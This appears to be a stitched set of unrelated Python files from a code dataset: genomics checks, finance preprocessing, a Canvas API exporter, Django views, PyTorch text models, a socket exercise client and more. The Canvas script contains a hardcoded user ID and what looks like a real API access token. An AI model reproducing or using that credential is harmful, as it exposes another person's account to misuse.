\n transcript))\n if int(gene_cds_stop) >= int(trans_cds_stop):\n pass\n else:\n if transcript.startswith(\"NM_\"):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_stop) <= cds_stop:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n else:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n else:\n if int(gene_cds_start) <= int(trans_cds_start) <= int(gene_cds_stop):\n pass\n else:\n if transcript.startswith(\"NM_\"):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_start) <= cds_stop:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_start, gene,\n exon,\n trans_cds_start,\n transcript))\n else:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_start, gene,\n exon,\n trans_cds_start,\n transcript))\n if int(gene_cds_stop) >= int(trans_cds_stop):\n pass\n else:\n if transcript.startswith(\"NM_\"):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_stop) <= cds_stop:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n else:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/asses_coding_sequences.py","file_name":"asses_coding_sequences.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"73829428","text":"from functools import reduce\nimport pandas as pd\nimport numpy as np\nimport os\n\n\ndef as_quarter(months):\n \"\"\"\n 월(month) 값을 분기(quarter) 값으로 전환\n Example: (1, 2, 3, 4, 5, 6) -> (1, 1, 1, 2, 2, 2)\n\n INPUT:\n x: 1 ~ 12 사이의 integer vector\n RETURN:\n 월 -> 분기로 전환된 integer vector\n \"\"\"\n months = pd.to_numeric(months)\n if not np.all(np.isin(months, np.arange(1, 13))):\n raise ValueError(\"range of months exceeds 1~12\")\n return (np.array(months) - 1) // 3 + 1\n\n\ndef is_quarter_interval(date_str):\n \"\"\"\n 시간 변수가 날짜 형식(ex: \"20010131\")인지\n 혹은 분기 형식(ex: \"2001/1 Quarter)인지 검사\n\n INPUT:\n x: date string vector\n RETURN:\n 날짜 형식이면 FALSE, 분기 형식이면 TRUE\n \"\"\"\n return len(str(date_str)) == 5\n\n\ndef reshape_long(df):\n \"\"\"\n Short form 데이터를 long form 데이터로 변환\n 시간 변수가 날짜 형식인 경우 분기 형식으로 변환\n\n INPUT:\n data: raw data를 불러들인 data frame\n RETURN:\n long form으로 전환된 data frame\n \"\"\"\n df = gather(df)\n df.val = pd.to_numeric(df.val)\n df = tidyup_timeframe(df, is_quarter_interval(df.time[0]))\n return df\n\n\ndef gather(df):\n df.rename(index=str, columns={\"Unnamed: 1\": \"code\", \"Unnamed: 2\": \"name\"}, inplace=True)\n df.columns = [\"y\"+format_quarter(str(c)) if c[0].isnumeric() else c for c in df.columns]\n df = pd.wide_to_long(df, stubnames=\"y\", i=[\"code\", \"name\"], j=\"time\")\n df = pd.DataFrame(df.to_records()).rename(index=str, columns={\"y\": \"val\"})\n return df\n\n\ndef format_quarter(string):\n return string.replace(\" \", \"\").replace(\"/\", \"\").replace(\"Quarter\", \"\").replace(\"SemiAnnual\", \"2\").replace(\"Annual\", \"4\")\n\n\ndef tidyup_timeframe(df, is_quarter):\n df.val = pd.to_numeric(df.val)\n if is_quarter:\n year_quarter = df.time.astype(str).str.extract('(.{4,4})(.{1,1})')\n year_quarter.columns = [\"year\", \"quarter\"]\n yq = year_quarter.year + \"-\" + year_quarter.quarter\n yq.name = \"time\"\n df = pd.concat([df.iloc[:, :2], yq, df.val], axis=1)\n else:\n year_quarter = df.time.astype(str).str.extract('(.{4,4})(.{2,2})')\n year_quarter.columns = [\"year\", \"quarter\"]\n yq = year_quarter.year + \"-\" + as_quarter(year_quarter.quarter).astype(str)\n yq.name = \"time\"\n df = pd.concat([df.iloc[:, :2], yq, df.val], axis=1)\n df = pd.DataFrame(df.groupby([\"code\", \"name\", \"time\"]).mean().to_records())\n df.sort_values(by=[\"code\", \"time\"], inplace=True)\n return df\n\n\ndef preprocess(path, file_names, var_names, extension=\".xls\"):\n dfs = []\n for name in file_names:\n print(name, end=\", \")\n file_path = os.path.join(path, name+extension)\n data = reshape_long( pd.read_excel(file_path, skiprows=5).iloc[1:, 1:] )\n dfs.append(data)\n\n vals = reduce(lambda x, y: x.merge(y, how=\"left\", on=[\"code\", \"name\", \"time\"]), dfs).iloc[:, 3:]\n vals.columns = var_names\n\n features = extract_features(vals)\n df = pd.concat([data.loc[:, [\"code\", \"time\"]], features], axis=1)\n return df\n\n\ndef extract_features(vals):\n leverage = vals.leverage\n asset_growth = vals.asset_growth\n shares_turnover = vals.trade_amount / vals.stock_num\n roa = vals.net_profit / vals.asset\n roe = vals.net_profit / vals.equity\n size = vals.market_cap\n pcr = vals.pcr\n per = vals.per\n equity_turnover = vals.equity_turnover\n volatility = vals.volatility\n logret = np.log(vals.price).diff()\n\n features = pd.concat([leverage, asset_growth, shares_turnover, roa, roe, size,\n pcr, per, equity_turnover, volatility, logret], axis=1)\n features.columns = [\"leverage\", \"asset_growth\", \"shares_turnover\", \"roa\", \"roe\", \"size\",\n \"pcr\", \"per\", \"equity_turnover\", \"volatility\", \"logret\"]\n return features\n","sub_path":"src/preprocessing_utils.py","file_name":"preprocessing_utils.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109986315","text":"import json\nimport requests\nimport numpy as np\nimport pandas as pd\n\nuser_id = '45110000000126834'\nacc_token = '4511~V35YjSpgz6zU1lSniHKUYjFvHNaE7h3koE8g9t6XUsXVTGv2ZGNoxn3FoRPxZTYC'\n\ndef pull_classes():\n\t#Gets a list of all classes\n\t#response = requests.get('https://canvas.instructure.com/api/v1/courses', params=access_token)\n\tclass_list = requests.get(f'https://canvas.instructure.com/api/v1/courses?access_token={acc_token}').json()\n\t\n\twith open('classes.json', 'w+') as f:\n\t\tjson.dump(class_list, f)\n\ndef get_classes():\n\twith open('classes.json', 'r') as f:\n\t\tclasses_all = json.load(f)\n\n\tclasses = {}\n\n\tfor distro in classes_all:\n\t\tprint(distro['name'])\n\t\tprint(distro['id'])\n\n\t\t#Adds classes to list based on user input\n\t\tch = input('Would you like to keep this class? (Y/N): ')\n\n\t\tif ch == 'Y' or ch == 'y':\n\t\t\tclasses.update({distro['name']: distro['id']})\n\treturn classes\n\ndef pull_assignments(class_id):\n\tassigns = requests.get(f'https://canvas.instructure.com/api/v1/users/{user_id}/courses/{class_id}/assignments?access_token={acc_token}').json()\n\tassignments = []\n\tfor a in assigns:\n\t\tassign_name = a['name']\n\t\tdue_date = a['due_at']\n\t\tassign_id = a['id']\n\t\tassign_pts_pos = a['points_possible']\n\t\tassignment_details = [assign_name, due_date, assign_pts_pos, assign_id]\n\t\tassignments.append(assignment_details)\n\treturn pd.DataFrame(np.array(assignments), columns=['Name', 'Due Date', 'Points Possible', 'ID'])\n\n\n \ndef csv_export(name, df):\n\tdf.to_excel(f'Assignments/{name}_assignments.xlsx')\n\tdf.to_csv(f'Assignments/{name}_assignments.csv')\n\n\n#pull_classes()\nclasses = get_classes()\nfor c in classes:\n\tdf = pull_assignments(classes[c])\n\tcsv_export(c, df)\n\n","sub_path":"json_read.py","file_name":"json_read.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"205426769","text":"\"\"\"Views for programming application.\"\"\"\n\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.http import JsonResponse, Http404\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist, PermissionDenied\nimport json\nfrom programming.models import (\n Question,\n TestCase,\n Attempt,\n TestCaseAttempt,\n)\nfrom research.models import StudyRegistration\n\nQUESTION_JAVASCRIPT = 'js/question_types/{}.js'\n\n\nclass IndexView(generic.base.TemplateView):\n \"\"\"Homepage for programming.\"\"\"\n\n template_name = 'programming/index.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Get additional context data for template.\"\"\"\n context = super().get_context_data(**kwargs)\n context['questions'] = Question.objects.select_subclasses()\n return context\n\n\nclass QuestionListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View for listing questions.\"\"\"\n\n model = Question\n context_object_name = 'questions'\n\n def get_queryset(self):\n \"\"\"Return questions objects for page.\n\n Returns:\n Question queryset.\n \"\"\"\n now = timezone.now()\n if self.request.user.is_authenticated:\n # Look for active study registration\n try:\n study_registration = StudyRegistration.objects.get(\n user=self.request.user,\n study_group__study__start_date__lte=now,\n study_group__study__end_date__gte=now,\n )\n except ObjectDoesNotExist:\n study_registration = None\n\n if study_registration:\n questions = study_registration.study_group.questions.select_subclasses()\n else:\n questions = Question.objects.all().select_subclasses()\n\n if self.request.user.is_authenticated:\n # TODO: Check if passed in last 90 days\n for question in questions:\n question.completed = Attempt.objects.filter(\n profile=self.request.user.profile,\n question=question,\n passed_tests=True,\n ).exists()\n return questions\n\n\nclass QuestionView(LoginRequiredMixin, generic.DetailView):\n \"\"\"Displays a question.\n\n This view requires to retrieve the object first in the context,\n in order to determine the required template to render.\n \"\"\"\n\n template_name = 'programming/question.html'\n\n def get_object(self, **kwargs):\n \"\"\"Get question object for view.\"\"\"\n try:\n question = Question.objects.get_subclass(\n pk=self.kwargs['pk']\n )\n except Question.DoesNotExist:\n raise Http404(\"No question matches the given ID.\")\n\n if self.request.user.is_authenticated:\n # Look for active study registration\n now = timezone.now()\n try:\n study_registration = StudyRegistration.objects.get(\n user=self.request.user,\n study_group__study__start_date__lte=now,\n study_group__study__end_date__gte=now,\n )\n except StudyRegistration.DoesNotExist:\n study_registration = None\n if study_registration and question not in study_registration.study_group.questions.select_subclasses():\n raise PermissionDenied\n return question\n\n def get_context_data(self, **kwargs):\n \"\"\"Get additional context data for template.\"\"\"\n context = super().get_context_data(**kwargs)\n context['question'] = self.object\n test_cases = self.object.test_cases.values()\n context['test_cases'] = test_cases\n context['test_cases_json'] = json.dumps(list(test_cases))\n context['question_js'] = QUESTION_JAVASCRIPT.format(self.object.QUESTION_TYPE)\n\n if self.request.user.is_authenticated:\n try:\n previous_attempt = Attempt.objects.filter(\n profile=self.request.user.profile,\n question=self.object,\n ).latest('datetime')\n except ObjectDoesNotExist:\n previous_attempt = None\n context['previous_attempt'] = previous_attempt\n return context\n\n\ndef save_question_attempt(request):\n \"\"\"Save user's attempt for a question.\n\n If the attempt is successful: add points if these haven't already\n been added.\n\n Args:\n request (Request): AJAX request from user.\n\n Returns:\n JSON response with result.\n \"\"\"\n result = {\n 'success': False,\n }\n if request.is_ajax():\n if request.user.is_authenticated:\n request_json = json.loads(request.body.decode('utf-8'))\n profile = request.user.profile\n question = Question.objects.get(pk=request_json['question'])\n user_code = request_json['user_input']\n\n # If same as previous attempt, don't save to database\n previous_attempt = Attempt.objects.filter(\n profile=profile,\n question=question,\n ).order_by('-datetime').first()\n if not previous_attempt or user_code != previous_attempt.user_code:\n test_cases = request_json['test_cases']\n total_tests = len(test_cases)\n total_passed = 0\n for test_case in test_cases.values():\n if test_case['passed']:\n total_passed += 1\n\n attempt = Attempt.objects.create(\n profile=profile,\n question=question,\n user_code=user_code,\n passed_tests=total_passed == total_tests,\n )\n\n # Create test case attempt objects\n for test_case_id, test_case_data in test_cases.items():\n test_case = TestCase.objects.get(pk=test_case_id)\n TestCaseAttempt.objects.create(\n attempt=attempt,\n test_case=test_case,\n passed=test_case_data['passed'],\n )\n result['success'] = True\n else:\n result['success'] = False\n result['message'] = 'Attempt not saved, same as previous attempt.'\n\n return JsonResponse(result)\n","sub_path":"codewof/programming/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102230722","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__title__=\"model\"\n__author__=\"ngc7293\"\n__mtime__=\"2020/9/20\"\n\"\"\"\n\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\n\nclass TextCnn(nn.Module):\n def __init__(self,\n vocab_size,\n embedding_dim,\n class_num,\n embedding_pretrained=None,\n kernel_size = [3, 4, 5],\n hidden_size = 100,\n dropout=0.5,\n sentence_len = 50):\n super(TextCnn, self).__init__()\n if embedding_pretrained is None:\n self.embed_layer = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim, padding_idx=sentence_len)\n else:\n self.embed_layer = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim,\n _weight=embedding_pretrained, padding_idx=sentence_len)\n\n self.conv_layer = nn.ModuleList([nn.Conv2d(1, hidden_size, (k, embedding_dim)) for k in kernel_size])\n\n self.dropout_layer = nn.Dropout(dropout)\n\n self.linear_layer = nn.Linear(3*hidden_size, class_num)\n\n def forward(self,x):\n \"\"\"\n :param x: batch_size , sentence_len\n :return:\n \"\"\"\n embed_out = self.embed_layer(x).unsqueeze(1)\n conv_out = [F.relu(conv(embed_out)).squeeze(3) for conv in self.conv_layer]\n pool_out = torch.cat([F.max_pool1d(out, out.size(2)).squeeze(2) for out in conv_out],1)\n\n out = self.linear_layer(pool_out)\n return out\n\nclass TextRnn(nn.Module):\n def __init__(self,\n vocab_size,\n embedding_dim,\n class_num,\n hidden_size,\n embedding_pretrained=None,\n dropout = 0.5,\n max_len = 50,\n device = torch.device('cpu')):\n super(TextRnn, self).__init__()\n\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.class_num = class_num\n self.hidden_size = hidden_size\n self.device = device\n\n if embedding_pretrained is None:\n self.embedding_layer = nn.Embedding(vocab_size, embedding_dim, padding_idx=max_len)\n else:\n self.embedding_layer = nn.Embedding(vocab_size, embedding_dim, padding_idx=max_len, _weight=embedding_pretrained)\n\n self.rnn_layer = nn.RNN(input_size=embedding_dim, hidden_size=hidden_size, batch_first=True)\n\n self.linear_layer = nn.Linear(hidden_size, class_num)\n\n def forward(self, x):\n batch_size, max_len = x.shape\n\n embedding_out = self.embedding_layer(x)\n\n h_0 = torch.randn(1,batch_size, self.hidden_size).to(self.device)\n _, h_n = self.rnn_layer(embedding_out,h_0)\n\n out = self.linear_layer(h_n).squeeze(0)\n return out\n\n\n","sub_path":"task2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"380949331","text":"import pandas as pd\nimport numpy as np\n# LETS GET OUR VIX DATA\nvix = pd.read_csv(r\"Pdata/vix.csv\", index_col = 0)\nvix = pd.DataFrame(vix['Close'])\nvix = pd.DataFrame(vix.loc['2010-01-01': '2017-01-01'])\nvix = vix.rename(columns = {'Close': 'vix'})\n\n\n#LETS GET THE EXOGENOUS VARIABLES \n#SENSEX index data\nbsesn = pd.read_csv(r\"Pdata/BSESN.csv\", index_col = 0)\nbsesn_dr = pd.DataFrame(bsesn['return'])\nbsesn_idr = pd.DataFrame(bsesn['idr_ret'])\nbsesn_dr = pd.DataFrame(bsesn_dr.loc['2010-01-01': '2017-01-01'])\nbsesn_idr = pd.DataFrame(bsesn_idr.loc['2010-01-01': '2017-01-01'])\nbsesn_dr = bsesn_dr.rename(columns = {'return': 'bsesn_dr'})\nbsesn_idr = bsesn_idr.rename(columns = {'idr_ret': 'bsesn_idr'})\n\n#MOVE index\nmove = pd.read_csv(r\"Pdata/MOVE.csv\", index_col = 0)\nmove = pd.DataFrame(move.loc['2010-01-01': '2017-01-01'])\nmove = move.rename(columns = {'Close': 'MOVE'})\nmove_l1 = move.shift(1)\nmove_l1 = move_l1.rename(columns = {'MOVE': 'MOVE_l1'})\n\n#S&P500 - split this into positive and negative, and take the 5 and 22 day MA as well like the L-HAR\nsnp = pd.read_csv(r\"Pdata/snp.csv\", index_col = 0)\nsnp = pd.DataFrame(snp.loc['2010-01-01': '2017-01-01'])\n\n#USD index \nusd = pd.read_csv(r\"Pdata/USD_index.csv\", index_col = 0)\nusd = pd.DataFrame(usd.loc['2010-01-01': '2017-01-01'])\nusd = pd.DataFrame(usd['return'])\nusd = usd.rename(columns = {'return': 'USD_lret'})\nusd_l1 = usd.shift(1)\nusd_l1 = usd_l1.rename(columns = {'USD_lret': 'USD_lret_l1'})\n\n#WTI\nwti = pd.read_csv(r\"Pdata/WTIc1.csv\", index_col = 0)\nwti = pd.DataFrame(wti.loc['2010-01-01': '2017-01-01'])\nwti = pd.DataFrame(wti['return'])\nwti = wti.rename(columns = {'return': 'WTI_lret'})\nwti_l1 = wti.shift(1)\nwti_l1 = wti_l1.rename(columns = {'WTI_lret': 'WTI_lret_l1'})\n\n#VVIX\nvvix = pd.read_csv(r\"Pdata/vvix.csv\", index_col = 0)\nvvix = pd.DataFrame(vvix.loc['2010-01-01': '2017-01-01'])\nvvix = pd.DataFrame(vvix['Close'])\nvvix = vvix.rename(columns = {'Close': 'vvix'})\nvvix_l1 = vvix.shift(1)\nvvix_l1 = vvix_l1.rename(columns = {'vvix': 'vvix_l1'})\n\n#SKEW\nskew = pd.read_csv(r\"Pdata/skew.csv\", index_col = 0)\nskew = pd.DataFrame(skew.loc['2010-01-01': '2017-01-01'])\nskew_l1 = skew.shift(1)\nskew_l1 = skew_l1.rename(columns = {'skew': 'skew_l1'})\nskew_change = pd.DataFrame(skew - skew.shift(1)).rename(columns = {'skew': 'Skew_diff'})\n\n#concat all the frames and make all fit the vix\ndata_vix = pd.concat([vix, snp, bsesn_dr, bsesn_idr, move, move_l1, usd, usd_l1, wti, wti_l1, vvix, vvix_l1, skew, skew_l1, skew_change], axis = 1)\n\n#foward fill the missing columns in the exogenous variables\ndata_vix.iloc[:,1:] = data_vix.iloc[:,1:].ffill()\n\n#drop values that arent in the VIX index\ndata_vix = data_vix.dropna(subset = ['vix'])\n\nprint(data_vix)\n\ndata_vix.to_csv(\"Pdata/vix_is.csv\")\n\n","sub_path":"Pinput/IS_data_prep.py","file_name":"IS_data_prep.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"418889982","text":"from django.shortcuts import render, redirect\n\nfrom django.http import HttpResponse\nfrom Book.models import Book\n# Create your views here.\n\ndef homepage(request):\n # all_books = Book.objects.all().filter(is_deleted='N')\n all_books = Book.active_objects.all()\n return render(request, template_name = 'home.html', context = {\"books\" : all_books})\n\ndef save_book(request):\n print(\"In save book\")\n print(request.POST)\n b_name = request.POST.get(\"name\")\n b_auther = request.POST.get(\"auth\")\n b_qty = request.POST.get(\"qty\")\n b_price = request.POST.get(\"price\")\n b_pub = request.POST.get(\"pub\")\n # b_tr = request.POST.get(\"true\")\n # b_fs = request.POST.get(\"false\")\n # print(b_name, b_auther, b_qty, b_price, b_tr, b_fs)\n print(b_name, b_auther, b_qty, b_price, b_pub)\n\n\n \n if b_pub == \"on\":\n flag = True\n else:\n flag = False\n bk = Book(name = b_name, auther = b_auther, qty = b_qty, price = b_price, is_published = flag) # to save book in database\n '''\n if b_tr =='on':\n flag = True\n elif b_fs == 'on':\n flag = False\n else:\n # raise Exception(\"Please select one option\")\n return HttpResponse(\"Please select one option from True or False button\")\n\n bk = Book(name = b_name, auther = b_auther, qty = b_qty, price = b_price, is_published = flag) # to save book in database\n '''\n bk.save()\n return redirect(\"Welcome\")\n\ndef edit_book(request, id):\n try:\n book_obj = Book.objects.get(id = id) \n except Book.DoesNotExist:\n msg = f\"No book found for id: {id}\"\n return HttpResponse(msg)\n\n # all_books = Book.objects.all().filter(is_deleted='N')\n all_books = Book.active_objects.all()\n return render(request, template_name = 'home.html', context = {\"books\" : all_books, \"book\" : book_obj})\n\ndef delete_book(request, pk):\n book_obj = Book.objects.get(id = pk)\n # book_obj.delete()\n book_obj.is_deleted = 'Y'\n book_obj.save()\n return redirect(\"Welcome\")\n\n\n\ndef hard_delete_book(request, pk):\n book_obj = Book.objects.get(id=pk)\n book_obj.delete()\n return redirect('Welcome')\n\n\ndef restore_book(request, id):\n book_obj = Book.objects.get(id=id)\n book_obj.is_deleted = 'N'\n book_obj.save()\n return redirect('Welcome')\n\n\ndef show_deleted_data(request):\n all_deleted_books = Book.inactive_objects.all() # thru custom manager\n return render(request, template_name='home.html', context={\"books\": all_deleted_books})\n\ndef delete_all_book(request):\n book = Book.active_objects.all()\n for bk in book:\n bk.is_deleted = 'Y'\n bk.save()\n return redirect('Welcome')\n\ndef restore_all_book(request):\n book = Book.inactive_objects.all()\n for bk in book:\n bk.is_deleted = 'N'\n bk.save()\n return redirect('Welcome')\n\n","sub_path":"Book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"498126896","text":"# -*- coding: utf-8 -*-\n# @Time : 2017-05-11 22:55\n# @Author : jesse\n# @File : Day7_socket_TCP_client.py\n\nimport socket\n\nclient = socket.socket()\nhost = socket.gethostname()\nport = 6964\n\nclient.connect((host,port))\nrec_size=0\nwhile True:\n cmd=input(\">>>:\")\n client.send(cmd.encode(\"utf-8\"))\n cmd_size=client.recv(1024) #接收服务端发过来的命令长度\n print(\"命令结果大小:\",cmd_size)\n while rec_size <= int(cmd_size.decode()):\n data = client.recv(1024)\n rec_size+=len(data)\n print(data.decode(\"utf-8\"))\n print(\"总共收到:,\",rec_size)\n\nclient.close()","sub_path":"python05-network_program/socket/day8/Day8_socket_client.py","file_name":"Day8_socket_client.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"71203312","text":"import tensorflow as tf, os, cv2, pdb, numpy as np, time, json, pandas, glob, hashlib\nfrom scipy.misc import imread, imresize\nfrom scipy import misc\nfrom train import build_forward\nfrom utils.annolist import AnnotationLib as al\nfrom utils.train_utils import add_rectangles, rescale_boxes\nfrom shapely.geometry import MultiPolygon, box\nfrom subprocess import check_output\nfrom zipfile import ZipFile\n\npandas.options.mode.chained_assignment = None\n\ndef get_image_dir(weights, test_boxes):\n weights_iteration = int(weights.split('-')[-1])\n return '%s/images_%s_%d' % (os.path.dirname(weights), os.path.basename(test_boxes)[:-5], weights_iteration)\n\nNAME = 'TensorBox'\n\nclass TensorBox:\n name = 'TensorBox'\n\n @classmethod\n def mk_hash(cls, path):\n '''\n Create an MD5 hash from a models weight file.\n Arguments:\n path : str - path to RetinaNet checkpoint\n '''\n dirs = path.split('/')\n if 'TensorBox' in dirs:\n dirs = dirs[dirs.index('TensorBox'):]\n path = '/'.join(dirs)\n else:\n path = os.path.join('TensorBox', path)\n\n md5 = hashlib.md5()\n md5.update(path.encode('utf-8'))\n return md5.hexdigest()\n\n @classmethod\n def zip_weights(cls, path, base_dir='./'):\n if not os.path.exists(path + '.meta'):\n raise ValueError('Invalid TensorBox checkpoint...')\n\n dirs = path.split('/')\n\n res = {\n 'name' : 'TensorBox',\n 'instance' : '_'.join(dirs[-2:]),\n 'id' : cls.mk_hash(path)\n }\n\n zipfile = os.path.join(base_dir, res['id'] + '.zip')\n\n if os.path.exists(zipfile):\n os.remove(zipfile)\n\n weight_dir = os.path.dirname(path)\n\n with ZipFile(zipfile, 'w') as z:\n for file in glob.glob(path + '*'):\n z.write(file, os.path.join(res['id'], os.path.basename(file)))\n z.write(os.path.join(weight_dir, 'hypes.json'), os.path.join(res['id'], 'hypes.json'))\n\n return zipfile\n\n def __init__(self, weights = None, cuda = True):\n if weights is None:\n if not os.path.exists('weights'):\n os.mkdir('weights')\n download_url = 'https://github.com/ArnholdInstitute/ColdSpots/releases/download/1.0/tensorbox.zip'\n if not os.path.exists('weights/tensorbox'):\n print('Downloading weights for tensorbox')\n if not os.path.exists(os.path.join('weights/tensorbox.zip')):\n check_output(['wget', download_url, '-O', 'weights/tensorbox.zip'])\n print('Unzipping...')\n check_output(['unzip', 'weights/tensorbox.zip', '-d', 'weights'])\n description = json.load(open('weights/tensorbox/description.json'))\n weights = os.path.join('weights/tensorbox', description['weights'])\n print('Building model...')\n \n self.weights = weights\n hypes_file = '%s/hypes.json' % os.path.dirname(weights)\n with open(hypes_file, 'r') as f:\n self.H = json.load(f)\n\n tf.reset_default_graph()\n self.H[\"grid_width\"] = self.H[\"image_width\"] / self.H[\"region_size\"]\n self.H[\"grid_height\"] = self.H[\"image_height\"] / self.H[\"region_size\"]\n\n self.x_in = tf.placeholder(tf.float32, name='x_in', shape=[self.H['image_height'], self.H['image_width'], 3])\n pred_boxes, pred_logits, pred_confidences, pred_confs_deltas, pred_boxes_deltas = build_forward(self.H, tf.expand_dims(self.x_in, 0), 'test', reuse=None)\n grid_area = self.H['grid_height'] * self.H['grid_width']\n pred_confidences = tf.reshape(tf.nn.softmax(tf.reshape(pred_confs_deltas, [grid_area * self.H['rnn_len'], 2])), [grid_area, self.H['rnn_len'], 2])\n if self.H['reregress']:\n pred_boxes = pred_boxes + pred_boxes_deltas\n\n self.pred_boxes = pred_boxes\n self.pred_confidences = pred_confidences\n saver = tf.train.Saver()\n\n self.session = tf.Session()\n\n self.session.run(tf.global_variables_initializer())\n saver.restore(self.session, weights)\n\n def close_session(self):\n self.session.close()\n\n def predict_image(self, image):\n \"\"\"\n Infer buildings for a single image.\n Inputs:\n image :: n x m x 3 ndarray - Should be in RGB format\n \"\"\"\n\n orig_img = image.copy()[:,:,:3]\n img = imresize(orig_img, (self.H[\"image_height\"], self.H[\"image_width\"]), interp='cubic')\n feed = {self.x_in: img}\n\n t0 = time.time()\n (np_pred_boxes, np_pred_confidences) = self.session.run([self.pred_boxes, self.pred_confidences], feed_dict=feed)\n total_time = time.time() - t0\n\n new_img, rects, all_rects = add_rectangles(\n self.H, \n [img], \n np_pred_confidences, \n np_pred_boxes,\n use_stitching=True, \n rnn_len=self.H['rnn_len'], \n min_conf=0.5, # only affects `rects`, not `all_rects`\n tau=0.25, \n show_suppressed=False\n )\n\n pred_anno = al.Annotation()\n pred_anno.rects = all_rects\n pred_anno = rescale_boxes((self.H[\"image_height\"], self.H[\"image_width\"]), pred_anno, orig_img.shape[0], orig_img.shape[1])\n\n pred_rects = pandas.DataFrame([[r.x1, r.y1, r.x2, r.y2, r.score] for r in all_rects], columns=['x1', 'y1', 'x2', 'y2', 'score'])\n\n return pred_rects\n\n def predict_all(self, test_boxes_file, data_dir = None):\n annos = json.load(open(test_boxes_file))\n true_annolist = al.parse(test_boxes_file)\n if data_dir is None:\n data_dir = os.path.join(os.path.dirname(test_boxes_file))\n\n total_time = 0.0\n\n for anno in annos:\n img_data = imread(os.path.join(data_dir, anno['image_path']))\n rects = self.predict_image(img_data)\n rects['image_id'] = anno['image_path']\n yield rects\n\n\n\n\n\n","sub_path":"tensorbox.py","file_name":"tensorbox.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444717006","text":"def filter_text(text):\n text = text.lower()\n text = [c for c in text if c in \"123456789йцукенгшщзхъфывапролджэячсмитьбюqwertyuiopasdfghjklzxcvbnm\"]\n text = ''.join(text)\n return text\n\n\nclass Filter():\n def showBanList(self):\n with open('banWords.txt', encoding='utf-8') as f:\n ban = f.read().splitlines()\n return ban\n\n def censor(self, text):\n for word in str(text.splitlines()).strip('[\\']').split(' '):\n for ban_word in self.showBanList():\n if filter_text(word) == ban_word:\n text = text.replace(word, \"****\")\n return text\n","sub_path":"427/xXx_Парные_копыта_xXx/Filter.py","file_name":"Filter.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569991625","text":"import requests\nimport pandas as pd\n\ndef get_pokemons(url='https://pokeapi.co/api/v2/pokemon-form/?limit=1118'):\n#get pokemons from api and return a dictionary\n\ti_id=1\n\tpokeDict = dict()\n\tresponse = requests.get(url)\n\tif response.status_code == 200:\n\n\t\tpayload = response.json()\n\t\t#try to get results, if not possible then get empty list\n\t\tresults = payload.get('results', [])\n\n\t\tif results:\n\t\t\t#if list not empty, iterate it\n\t\t\tfor pokemon in results:\n\t\t\t\tname = pokemon ['name']\n\t\t\t\tpokeDict[i_id] = name\n\t\t\t\ti_id+=1\n\n\t\treturn pokeDict\n\n\ndef poke_df (poke_dict):\n\t#\n df_pokeDex = pd.DataFrame(index = poke_dict.keys() , data = poke_dict.values(), columns = ['Pokemon'])\n return df_pokeDex\n\nif __name__ == '__main__':\n url = 'https://pokeapi.co/api/v2/pokemon-form'\n df_pokeDex = poke_df(get_pokemons())\n df_pokeDex.to_csv('pokemons_list.csv')","sub_path":"pokemon_list.py","file_name":"pokemon_list.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497927978","text":"import ROOT\nimport numpy as np\nimport RootPlotLibs as RPL\n\ndef extractDataFromFile(pathToData):\n\tcalData = 